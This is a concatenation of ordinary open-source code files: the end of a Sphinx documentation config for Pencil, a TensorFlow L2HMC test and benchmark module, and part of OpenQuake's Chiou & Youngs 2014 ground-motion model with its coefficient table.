# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Pencildoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Pencil.tex', u'Pencil Documentation',
u'Pencil Contributors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pencil', u'Pencil Documentation',
[u'Pencil Contributors'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Pencil', u'Pencil Documentation',
u'Pencil Contributors', 'Pencil', 'Multi-platform GUI Prototyping/Wireframing',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| gpl-2.0 |
Bismarrck/tensorflow | tensorflow/contrib/eager/python/examples/l2hmc/l2hmc_test.py | 23 | 8259 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests l2hmc fit to 2D strongly correlated Gaussian executed eagerly."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy.random as npr
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from tensorflow.contrib.eager.python.examples.l2hmc import l2hmc
def get_default_hparams():
return tf.contrib.training.HParams(
x_dim=2,
n_samples=200,
n_steps=10,
eps=.1,
n_iters=10,
learning_rate=.0003,
n_warmup_iters=3)
def step(dynamics, optimizer, samples):
loss, grads, samples, _ = l2hmc.loss_and_grads(
dynamics, samples, loss_fn=l2hmc.compute_loss)
optimizer.apply_gradients(zip(grads, dynamics.variables))
return loss, samples
# To be defunnable, the function cannot return an Operation, so the above
# function is used for defun or eager, and this function is used in graph to be
# able to run the gradient updates.
def graph_step(dynamics, optimizer, samples):
loss, grads, samples, _ = l2hmc.loss_and_grads(
dynamics, samples, loss_fn=l2hmc.compute_loss)
train_op = optimizer.apply_gradients(zip(grads, dynamics.variables))
return train_op, loss, samples
def warmup(dynamics,
optimizer,
n_iters=1,
n_samples=200,
step_fn=step):
"""Warmup optimization to reduce overhead."""
samples = tf.random_normal(
shape=[n_samples, dynamics.x_dim], dtype=tf.float32)
for _ in range(n_iters):
_, samples = step_fn(dynamics, optimizer, samples)
def fit(dynamics,
samples,
optimizer,
step_fn=step,
n_iters=5000,
verbose=True,
logdir=None):
"""Fit L2HMC sampler with given log-likelihood function."""
if logdir:
summary_writer = tf.contrib.summary.create_file_writer(logdir)
for i in range(n_iters):
loss, samples = step_fn(dynamics, optimizer, samples)
if verbose:
print("Iteration %d: loss %.4f" % (i, loss))
if logdir:
with summary_writer.as_default():
with tf.contrib.summary.always_record_summaries():
tf.contrib.summary.scalar("loss", loss)
class L2hmcTest(tf.test.TestCase):
"""Unit tests for l2hmc in both eager and graph mode."""
def test_apply_transition(self):
"""Testing function `Dynamics.apply_transition` in graph and eager mode."""
# Eager mode testing
hparams = get_default_hparams()
energy_fn, _, _ = l2hmc.get_scg_energy_fn()
dynamics = l2hmc.Dynamics(
x_dim=hparams.x_dim,
minus_loglikelihood_fn=energy_fn,
n_steps=hparams.n_steps,
eps=hparams.eps)
samples = tf.random_normal(shape=[hparams.n_samples, hparams.x_dim])
x_, v_, x_accept_prob, x_out = dynamics.apply_transition(samples)
self.assertEqual(x_.shape, v_.shape)
self.assertEqual(x_out.shape, samples.shape)
self.assertEqual(x_.shape, x_out.shape)
self.assertEqual(x_accept_prob.shape, (hparams.n_samples,))
# Graph mode testing
with tf.Graph().as_default():
energy_fn, _, _ = l2hmc.get_scg_energy_fn()
dynamics = l2hmc.Dynamics(
x_dim=hparams.x_dim,
minus_loglikelihood_fn=energy_fn,
n_steps=hparams.n_steps,
eps=hparams.eps)
x = tf.placeholder(tf.float32, shape=[None, hparams.x_dim])
x_, v_, x_accept_prob, x_out = dynamics.apply_transition(x)
samples = npr.normal(size=[hparams.n_samples, hparams.x_dim])
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
np_x_, np_v_, np_x_accept_prob, np_x_out = sess.run(
[x_, v_, x_accept_prob, x_out], feed_dict={x: samples})
self.assertEqual(np_x_.shape, np_v_.shape)
self.assertEqual(samples.shape, np_x_out.shape)
self.assertEqual(np_x_.shape, np_x_out.shape)
self.assertEqual(np_x_accept_prob.shape, (hparams.n_samples,))
class L2hmcBenchmark(tf.test.Benchmark):
"""Eager and graph benchmarks for l2hmc."""
def benchmark_graph(self):
"""Benchmark Graph performance."""
hparams = get_default_hparams()
tf.enable_resource_variables()
for sample_size in [10, 25, 50, 100, 200]:
hparams.n_samples = sample_size
tf.reset_default_graph()
with tf.Graph().as_default():
energy_fn, _, _ = l2hmc.get_scg_energy_fn()
x = tf.random_normal([hparams.n_samples, hparams.x_dim],
dtype=tf.float32)
dynamics = l2hmc.Dynamics(
x_dim=hparams.x_dim,
minus_loglikelihood_fn=energy_fn,
n_steps=hparams.n_steps,
eps=hparams.eps)
loss, _, _ = l2hmc.compute_loss(dynamics, x)
optimizer = tf.train.AdamOptimizer(learning_rate=hparams.learning_rate)
train_op, loss, _ = graph_step(dynamics, optimizer, x)
# Single thread; fairer comparison against eager
session_conf = tf.ConfigProto(inter_op_parallelism_threads=1)
with tf.Session(config=session_conf) as sess:
sess.run(tf.global_variables_initializer())
# Warmup to reduce initialization effect when timing
for _ in range(hparams.n_warmup_iters):
_, _ = sess.run([train_op, loss])
# Training
start_time = time.time()
for i in range(hparams.n_iters):
_, loss_np = sess.run([train_op, loss])
print("Iteration %d: loss %.4f" % (i, loss_np))
wall_time = (time.time() - start_time) / hparams.n_iters
examples_per_sec = hparams.n_samples / wall_time
self.report_benchmark(
name="graph_train_%s_%d" %
("gpu" if tf.test.is_gpu_available() else "cpu", sample_size),
iters=hparams.n_iters,
extras={"examples_per_sec": examples_per_sec},
wall_time=wall_time)
def benchmark_eager(self):
self._benchmark_eager()
def benchmark_eager_defun(self):
self._benchmark_eager(defun=True)
def _benchmark_eager(self, defun=False):
"""Benchmark Eager performance."""
hparams = get_default_hparams()
for sample_size in [10, 25, 50, 100, 200]:
hparams.n_samples = sample_size
energy_fn, _, _ = l2hmc.get_scg_energy_fn()
dynamics = l2hmc.Dynamics(
x_dim=hparams.x_dim,
minus_loglikelihood_fn=energy_fn,
n_steps=hparams.n_steps,
eps=hparams.eps)
optimizer = tf.train.AdamOptimizer(learning_rate=hparams.learning_rate)
step_fn = tfe.defun(step) if defun else step
# Warmup to reduce initialization effect when timing
warmup(
dynamics,
optimizer,
n_iters=hparams.n_warmup_iters,
n_samples=hparams.n_samples,
step_fn=step_fn)
# Training
samples = tf.random_normal(
shape=[hparams.n_samples, hparams.x_dim], dtype=tf.float32)
start_time = time.time()
fit(dynamics,
samples,
optimizer,
step_fn=step_fn,
n_iters=hparams.n_iters)
wall_time = (time.time() - start_time) / hparams.n_iters
examples_per_sec = hparams.n_samples / wall_time
self.report_benchmark(
name="eager_train_%s%s_%d" %
("gpu" if tf.test.is_gpu_available() else "cpu",
"_defun" if defun else "", sample_size),
iters=hparams.n_iters,
extras={"examples_per_sec": examples_per_sec},
wall_time=wall_time)
del dynamics
if __name__ == "__main__":
tf.enable_eager_execution()
tf.test.main()
| apache-2.0 |
gem/oq-hazardlib | openquake/hazardlib/gsim/chiou_youngs_2014.py | 1 | 21363 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2012-2017 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Module exports :class:`ChiouYoungs2014`.
"""
from __future__ import division
import numpy as np
import math
from openquake.hazardlib.gsim.base import GMPE, CoeffsTable
from openquake.hazardlib import const
from openquake.hazardlib.imt import PGA, PGV, SA
class ChiouYoungs2014(GMPE):
"""
Implements GMPE developed by Brian S.-J. Chiou and Robert R. Youngs
and published as "Updated of the Chiou and Youngs NGA Model for the
Average Horizontal Component of Peak Ground Motion and Response Spectra"
(2014, Earthquake Spectra).
"""
#: Supported tectonic region type is active shallow crust
DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST
#: Supported intensity measure types are spectral acceleration,
#: peak ground velocity and peak ground acceleration
DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([
PGA,
PGV,
SA
])
#: Supported intensity measure component is orientation-independent
#: measure :attr:`~openquake.hazardlib.const.IMC.RotD50`,
DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.RotD50
#: Supported standard deviation types are inter-event, intra-event
#: and total, see chapter "Variance model".
DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([
const.StdDev.TOTAL,
const.StdDev.INTER_EVENT,
const.StdDev.INTRA_EVENT
])
#: Required site parameters are Vs30, Vs30 measured flag
#: and Z1.0.
REQUIRES_SITES_PARAMETERS = set(('vs30', 'vs30measured', 'z1pt0'))
#: Required rupture parameters are magnitude, rake,
#: dip and ztor.
REQUIRES_RUPTURE_PARAMETERS = set(('dip', 'rake', 'mag', 'ztor'))
#: Required distance measures are RRup, Rjb and Rx.
REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx'))
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
# extracting dictionary of coefficients specific to required
# intensity measure type.
C = self.COEFFS[imt]
# intensity on a reference soil is used for both mean
# and stddev calculations.
ln_y_ref = self._get_ln_y_ref(rup, dists, C)
# exp1 and exp2 are parts of eq. 12 and eq. 13,
# calculate it once for both.
exp1 = np.exp(C['phi3'] * (sites.vs30.clip(-np.inf, 1130) - 360))
exp2 = np.exp(C['phi3'] * (1130 - 360))
mean = self._get_mean(sites, C, ln_y_ref, exp1, exp2)
stddevs = self._get_stddevs(sites, rup, C, stddev_types,
ln_y_ref, exp1, exp2)
return mean, stddevs
def _get_mean(self, sites, C, ln_y_ref, exp1, exp2):
"""
Add site effects to an intensity.
Implements eq. 13b.
"""
# we do not support estimating of basin depth and instead
# rely on it being available (since we require it).
# centered_z1pt0
centered_z1pt0 = self._get_centered_z1pt0(sites)
# we consider random variables being zero since we want
# to find the exact mean value.
eta = epsilon = 0.
ln_y = (
# first line of eq. 12
ln_y_ref + eta
# second line
+ C['phi1'] * np.log(sites.vs30 / 1130).clip(-np.inf, 0)
# third line
+ C['phi2'] * (exp1 - exp2)
* np.log((np.exp(ln_y_ref) * np.exp(eta) + C['phi4']) / C['phi4'])
# fourth line
+ C['phi5']
* (1.0 - np.exp(-1. * centered_z1pt0 / C['phi6']))
# fifth line
+ epsilon
)
return ln_y
def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2):
"""
Get standard deviation for a given intensity on reference soil.
Implements equations 13 for inter-event, intra-event
and total standard deviations.
"""
Fmeasured = sites.vs30measured
Finferred = 1 - sites.vs30measured
# eq. 13 to calculate inter-event standard error
mag_test = min(max(rup.mag, 5.0), 6.5) - 5.0
tau = C['tau1'] + (C['tau2'] - C['tau1']) / 1.5 * mag_test
# b and c coeffs from eq. 10
b = C['phi2'] * (exp1 - exp2)
c = C['phi4']
y_ref = np.exp(ln_y_ref)
# eq. 13
NL = b * y_ref / (y_ref + c)
sigma = ((C['sig1'] + (C['sig2'] - C['sig1']) * mag_test / 1.5)
* np.sqrt((C['sig3'] * Finferred + 0.7 * Fmeasured) +
(1. + NL) ** 2.))
ret = []
for stddev_type in stddev_types:
assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
if stddev_type == const.StdDev.TOTAL:
# eq. 13
ret += [np.sqrt(((1 + NL) ** 2) * (tau ** 2) + (sigma ** 2))]
elif stddev_type == const.StdDev.INTRA_EVENT:
ret.append(sigma)
elif stddev_type == const.StdDev.INTER_EVENT:
# this is implied in eq. 21
ret.append(np.abs((1 + NL) * tau))
return ret
def _get_ln_y_ref(self, rup, dists, C):
"""
Get an intensity on a reference soil.
Implements eq. 13a.
"""
# reverse faulting flag
Frv = 1. if 30 <= rup.rake <= 150 else 0.
# normal faulting flag
Fnm = 1. if -120 <= rup.rake <= -60 else 0.
# hanging wall flag
Fhw = np.zeros_like(dists.rx)
idx = np.nonzero(dists.rx >= 0.)
Fhw[idx] = 1.
# a part in eq. 11
mag_test1 = np.cosh(2. * max(rup.mag - 4.5, 0))
# centered DPP
centered_dpp = self._get_centered_cdpp(dists)
# centered_ztor
centered_ztor = self._get_centered_ztor(rup, Frv)
#
dist_taper = np.fmax(1 - (np.fmax(dists.rrup - 40,
np.zeros_like(dists)) / 30.),
np.zeros_like(dists))
dist_taper = dist_taper.astype(np.float64)
ln_y_ref = (
# first part of eq. 11
C['c1']
+ (C['c1a'] + C['c1c'] / mag_test1) * Frv
+ (C['c1b'] + C['c1d'] / mag_test1) * Fnm
+ (C['c7'] + C['c7b'] / mag_test1) * centered_ztor
+ (C['c11'] + C['c11b'] / mag_test1) *
np.cos(math.radians(rup.dip)) ** 2
# second part
+ C['c2'] * (rup.mag - 6)
+ ((C['c2'] - C['c3']) / C['cn'])
* np.log(1 + np.exp(C['cn'] * (C['cm'] - rup.mag)))
# third part
+ C['c4']
* np.log(dists.rrup + C['c5']
* np.cosh(C['c6'] * max(rup.mag - C['chm'], 0)))
+ (C['c4a'] - C['c4'])
* np.log(np.sqrt(dists.rrup ** 2 + C['crb'] ** 2))
# forth part
+ (C['cg1'] + C['cg2'] / (np.cosh(max(rup.mag - C['cg3'], 0))))
* dists.rrup
# fifth part
+ C['c8'] * dist_taper
* min(max(rup.mag - 5.5, 0) / 0.8, 1.0)
* np.exp(-1 * C['c8a'] * (rup.mag - C['c8b']) ** 2) * centered_dpp
# sixth part
+ C['c9'] * Fhw * np.cos(math.radians(rup.dip)) *
(C['c9a'] + (1 - C['c9a']) * np.tanh(dists.rx / C['c9b']))
* (1 - np.sqrt(dists.rjb ** 2 + rup.ztor ** 2)
/ (dists.rrup + 1.0))
)
return ln_y_ref
def _get_centered_z1pt0(self, sites):
"""
Get z1pt0 centered on the Vs30- dependent avarage z1pt0(m)
California and non-Japan regions
"""
#: California and non-Japan regions
mean_z1pt0 = (-7.15 / 4.) * np.log(((sites.vs30) ** 4. + 570.94 ** 4.)
/ (1360 ** 4. + 570.94 ** 4.))
centered_z1pt0 = sites.z1pt0 - np.exp(mean_z1pt0)
return centered_z1pt0
def _get_centered_ztor(self, rup, Frv):
"""
Get ztor centered on the M- dependent avarage ztor(km)
by different fault types.
"""
if Frv == 1:
mean_ztor = max(2.704 - 1.226 * max(rup.mag - 5.849, 0.0), 0.) ** 2
centered_ztor = rup.ztor - mean_ztor
else:
mean_ztor = max(2.673 - 1.136 * max(rup.mag - 4.970, 0.0), 0.) ** 2
centered_ztor = rup.ztor - mean_ztor
return centered_ztor
def _get_centered_cdpp(self, dists):
"""
Get directivity prediction parameter centered on the avgerage
directivity prediction parameter. Here we set the centered_dpp
equals to zero, since the near fault directivity effect prediction is
off in our calculation.
"""
centered_dpp = 0.
return centered_dpp
#: Coefficient tables are constructed from values in tables 1 - 5
COEFFS = CoeffsTable(sa_damping=5, table="""\
IMT c1 c1a c1b c1c c1d cn cm c2 c3 c4 c4a crb c5 chm c6 c7 c7b c8 c8a c8b c9 c9a c9b c11 c11b cg1 cg2 cg3 phi1 phi2 phi3 phi4 phi5 phi6 gjpit gwn phi1jp phi5jp phi6jp tau1 tau2 sig1 sig2 sig3 sig2jp
pga -1.5065 0.165 -0.255 -0.165 0.255 16.0875 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0956 0.4908 0.0352 0.0462 0. 0.2695 0.4833 0.9228 0.1202 6.8607 0. -0.4536 -0.007146 -0.006758 4.2542 -0.521 -0.1417 -0.00701 0.102151 0. 300 1.5817 0.7594 -0.6846 0.459 800. 0.4 0.26 0.4912 0.3762 0.8 0.4528
pgv 2.3549 0.165 -0.0626 -0.165 0.0626 3.3024 5.423 1.06 2.3152 -2.1 -0.5 50 5.8096 3.0514 0.4407 0.0324 0.0097 0.2154 0.2695 5. 0.3079 0.1 6.5 0 -0.3834 -0.001852 -0.007403 4.3439 -0.7936 -0.0699 -0.008444 5.41 0.0202 300. 2.2306 0.335 -0.7966 0.9488 800. 0.3894 0.2578 0.4785 0.3629 0.7504 0.3918
0.01 -1.5065 0.165 -0.255 -0.165 0.255 16.0875 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0956 0.4908 0.0352 0.0462 0. 0.2695 0.4833 0.9228 0.1202 6.8607 0. -0.4536 -0.007146 -0.006758 4.2542 -0.521 -0.1417 -0.00701 0.102151 0. 300 1.5817 0.7594 -0.6846 0.459 800. 0.4 0.26 0.4912 0.3762 0.8 0.4528
0.02 -1.4798 0.165 -0.255 -0.165 0.255 15.7118 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0963 0.4925 0.0352 0.0472 0. 0.2695 1.2144 0.9296 0.1217 6.8697 0. -0.4536 -0.007249 -0.006758 4.2386 -0.5055 -0.1364 -0.007279 0.10836 0. 300 1.574 0.7606 -0.6681 0.458 800. 0.4026 0.2637 0.4904 0.3762 0.8 0.4551
0.03 -1.2972 0.165 -0.255 -0.165 0.255 15.8819 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0974 0.4992 0.0352 0.0533 0. 0.2695 1.6421 0.9396 0.1194 6.9113 0. -0.4536 -0.007869 -0.006758 4.2519 -0.4368 -0.1403 -0.007354 0.119888 0. 300 1.5544 0.7642 -0.6314 0.462 800. 0.4063 0.2689 0.4988 0.3849 0.8 0.4571
0.04 -1.1007 0.165 -0.255 -0.165 0.255 16.4556 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.0988 0.5037 0.0352 0.0596 0. 0.2695 1.9456 0.9661 0.1166 7.0271 0. -0.4536 -0.008316 -0.006758 4.296 -0.3752 -0.1591 -0.006977 0.133641 0. 300 1.5502 0.7676 -0.5855 0.453 800. 0.4095 0.2736 0.5049 0.391 0.8 0.4642
0.05 -0.9292 0.165 -0.255 -0.165 0.255 17.6453 4.9993 1.06 1.9636 -2.1 -0.5 50 6.4551 3.1011 0.5048 0.0352 0.0639 0. 0.2695 2.181 0.9794 0.1176 7.0959 0. -0.4536 -0.008743 -0.006758 4.3578 -0.3469 -0.1862 -0.006467 0.148927 0. 300 1.5391 0.7739 -0.5457 0.436 800. 0.4124 0.2777 0.5096 0.3957 0.8 0.4716
0.075 -0.658 0.165 -0.254 -0.165 0.254 20.1772 5.0031 1.06 1.9636 -2.1 -0.5 50 6.4551 3.1094 0.5048 0.0352 0.063 0. 0.2695 2.6087 1.026 0.1171 7.3298 0. -0.4536 -0.009537 -0.00619 4.5455 -0.3747 -0.2538 -0.005734 0.190596 0. 300 1.4804 0.7956 -0.4685 0.383 800. 0.4179 0.2855 0.5179 0.4043 0.8 0.5022
0.1 -0.5613 0.165 -0.253 -0.165 0.253 19.9992 5.0172 1.06 1.9636 -2.1 -0.5 50 6.8305 3.2381 0.5048 0.0352 0.0532 0. 0.2695 2.9122 1.0177 0.1146 7.2588 0. -0.4536 -0.00983 -0.005332 4.7603 -0.444 -0.2943 -0.005604 0.230662 0. 300 1.4094 0.7932 -0.4985 0.375 800. 0.4219 0.2913 0.5236 0.4104 0.8 0.523
0.12 -0.5342 0.165 -0.252 -0.165 0.252 18.7106 5.0315 1.06 1.9795 -2.1 -0.5 50 7.1333 3.3407 0.5048 0.0352 0.0452 0. 0.2695 3.1045 1.0008 0.1128 7.2372 0. -0.4536 -0.009913 -0.004732 4.8963 -0.4895 -0.3077 -0.005696 0.253169 0. 300 1.3682 0.7768 -0.5603 0.377 800. 0.4244 0.2949 0.527 0.4143 0.8 0.5278
0.15 -0.5462 0.165 -0.25 -0.165 0.25 16.6246 5.0547 1.06 2.0362 -2.1 -0.5 50 7.3621 3.43 0.5045 0.0352 0.0345 0. 0.2695 3.3399 0.9801 0.1106 7.2109 0. -0.4536 -0.009896 -0.003806 5.0644 -0.5477 -0.3113 -0.005845 0.266468 0. 300 1.3241 0.7437 -0.6451 0.379 800. 0.4275 0.2993 0.5308 0.4191 0.8 0.5304
0.17 -0.5858 0.165 -0.248 -0.165 0.248 15.3709 5.0704 1.06 2.0823 -2.1 -0.5 50 7.4365 3.4688 0.5036 0.0352 0.0283 0. 0.2695 3.4719 0.9652 0.115 7.2491 0. -0.4536 -0.009787 -0.00328 5.1371 -0.5922 -0.3062 -0.005959 0.26506 0. 300 1.3071 0.7219 -0.6981 0.38 800. 0.4292 0.3017 0.5328 0.4217 0.8 0.531
0.2 -0.6798 0.165 -0.2449 -0.165 0.2449 13.7012 5.0939 1.06 2.1521 -2.1 -0.5 50 7.4972 3.5146 0.5016 0.0352 0.0202 0. 0.2695 3.6434 0.9459 0.1208 7.2988 0. -0.444 -0.009505 -0.00269 5.188 -0.6693 -0.2927 -0.006141 0.255253 0. 300 1.2931 0.6922 -0.7653 0.384 800. 0.4313 0.3047 0.5351 0.4252 0.8 0.5312
0.25 -0.8663 0.165 -0.2382 -0.165 0.2382 11.2667 5.1315 1.06 2.2574 -2.1 -0.5 50 7.5416 3.5746 0.4971 0.0352 0.009 0. 0.2695 3.8787 0.9196 0.1208 7.3691 0. -0.3539 -0.008918 -0.002128 5.2164 -0.7766 -0.2662 -0.006439 0.231541 0. 300 1.315 0.6579 -0.8469 0.393 800. 0.4341 0.3087 0.5377 0.4299 0.7999 0.5309
0.3 -1.0514 0.165 -0.2313 -0.165 0.2313 9.1908 5.167 1.06 2.344 -2.1 -0.5 50 7.56 3.6232 0.4919 0.0352 -0.0004 0. 0.2695 4.0711 0.8829 0.1175 6.8789 0. -0.2688 -0.008251 -0.001812 5.1954 -0.8501 -0.2405 -0.006704 0.207277 0.001 300 1.3514 0.6362 -0.8999 0.408 800. 0.4363 0.3119 0.5395 0.4338 0.7997 0.5307
0.4 -1.3794 0.165 -0.2146 -0.165 0.2146 6.5459 5.2317 1.06 2.4709 -2.1 -0.5 50 7.5735 3.6945 0.4807 0.0352 -0.0155 0. 0.2695 4.3745 0.8302 0.106 6.5334 0. -0.1793 -0.007267 -0.001274 5.0899 -0.9431 -0.1975 -0.007125 0.165464 0.004 300 1.4051 0.6049 -0.9618 0.462 800. 0.4396 0.3165 0.5422 0.4399 0.7988 0.531
0.5 -1.6508 0.165 -0.1972 -0.165 0.1972 5.2305 5.2893 1.06 2.5567 -2.1 -0.5 50 7.5778 3.7401 0.4707 0.0352 -0.0278 0.0991 0.2695 4.6099 0.7884 0.1061 6.526 0. -0.1428 -0.006492 -0.001074 4.7854 -1.0044 -0.1633 -0.007435 0.133828 0.01 300 1.4402 0.5507 -0.9945 0.524 800. 0.4419 0.3199 0.5433 0.4446 0.7966 0.5313
0.75 -2.1511 0.165 -0.162 -0.165 0.162 3.7896 5.4109 1.06 2.6812 -2.1 -0.5 50 7.5808 3.7941 0.4575 0.0352 -0.0477 0.1982 0.2695 5.0376 0.6754 0.1 6.5 0. -0.1138 -0.005147 -0.001115 4.3304 -1.0602 -0.1028 -0.00812 0.085153 0.034 300 1.528 0.3582 -1.0225 0.658 800. 0.4459 0.3255 0.5294 0.4533 0.7792 0.5309
1 -2.5365 0.165 -0.14 -0.165 0.14 3.3024 5.5106 1.06 2.7474 -2.1 -0.5 50 7.5814 3.8144 0.4522 0.0352 -0.0559 0.2154 0.2695 5.3411 0.6196 0.1 6.5 0. -0.1062 -0.004277 -0.001197 4.1667 -1.0941 -0.0699 -0.008444 0.058595 0.067 300 1.6523 0.2003 -1.0002 0.78 800. 0.4484 0.3291 0.5105 0.4594 0.7504 0.5302
1.5 -3.0686 0.165 -0.1184 -0.165 0.1184 2.8498 5.6705 1.06 2.8161 -2.1 -0.5 50 7.5817 3.8284 0.4501 0.0352 -0.063 0.2154 0.2695 5.7688 0.5101 0.1 6.5 0. -0.102 -0.002979 -0.001675 4.0029 -1.1142 -0.0425 -0.007707 0.031787 0.143 300 1.8872 0.0356 -0.9245 0.96 800. 0.4515 0.3335 0.4783 0.468 0.7136 0.5276
2 -3.4148 0.1645 -0.11 -0.1645 0.11 2.5417 5.7981 1.06 2.8514 -2.1 -0.5 50 7.5818 3.833 0.45 0.0352 -0.0665 0.2154 0.2695 6.0723 0.3917 0.1 6.5 0. -0.1009 -0.002301 -0.002349 3.8949 -1.1154 -0.0302 -0.004792 0.019716 0.203 300 2.1348 0. -0.8626 1.11 800. 0.4534 0.3363 0.4681 0.4681 0.7035 0.5167
3 -3.9013 0.1168 -0.104 -0.1168 0.104 2.1488 5.9983 1.06 2.8875 -2.1 -0.5 50 7.5818 3.8361 0.45 0.016 -0.0516 0.2154 0.2695 6.5 0.1244 0.1 6.5 0. -0.1003 -0.001344 -0.003306 3.7928 -1.1081 -0.0129 -0.001828 0.009643 0.277 300 3.5752 0. -0.7882 1.291 800. 0.4558 0.3398 0.4617 0.4617 0.7006 0.4917
4 -4.2466 0.0732 -0.102 -0.0732 0.102 1.8957 6.1552 1.06 2.9058 -2.1 -0.5 50 7.5818 3.8369 0.45 0.0062 -0.0448 0.2154 0.2695 6.8035 0.0086 0.1 6.5 0. -0.1001 -0.001084 -0.003566 3.7443 -1.0603 -0.0016 -0.001523 0.005379 0.309 300 3.8646 0. -0.7195 1.387 800. 0.4574 0.3419 0.4571 0.4571 0.7001 0.4682
5 -4.5143 0.0484 -0.101 -0.0484 0.101 1.7228 6.2856 1.06 2.9169 -2.1 -0.5 50 7.5818 3.8376 0.45 0.0029 -0.0424 0.2154 0.2695 7.0389 0. 0.1 6.5 0. -0.1001 -0.00101 -0.00364 3.709 -0.9872 0. -0.00144 0.003223 0.321 300 3.7292 0. -0.656 1.433 800. 0.4584 0.3435 0.4535 0.4535 0.7 0.4517
7.5 -5.0009 0.022 -0.101 -0.022 0.101 1.5737 6.5428 1.06 2.932 -2.1 -0.5 50 7.5818 3.838 0.45 0.0007 -0.0348 0.2154 0.2695 7.4666 0. 0.1 6.5 0. -0.1 -0.000964 -0.003686 3.6632 -0.8274 0. -0.001369 0.001134 0.329 300 2.3763 0. -0.5202 1.46 800. 0.4601 0.3459 0.4471 0.4471 0.7 0.4167
10 -5.3461 0.0124 -0.1 -0.0124 0.1 1.5265 6.7415 1.06 2.9396 -2.1 -0.5 50 7.5818 3.838 0.45 0.0003 -0.0253 0.2154 0.2695 7.77 0. 0.1 6.5 0. -0.1 -0.00095 -0.0037 3.623 -0.7053 0. -0.001361 0.000515 0.33 300 1.7679 0. -0.4068 1.464 800. 0.4612 0.3474 0.4426 0.4426 0.7 0.3755
""")
class ChiouYoungs2014PEER(ChiouYoungs2014):
"""
This implements the Chiou & Youngs (2014) GMPE for use with the PEER
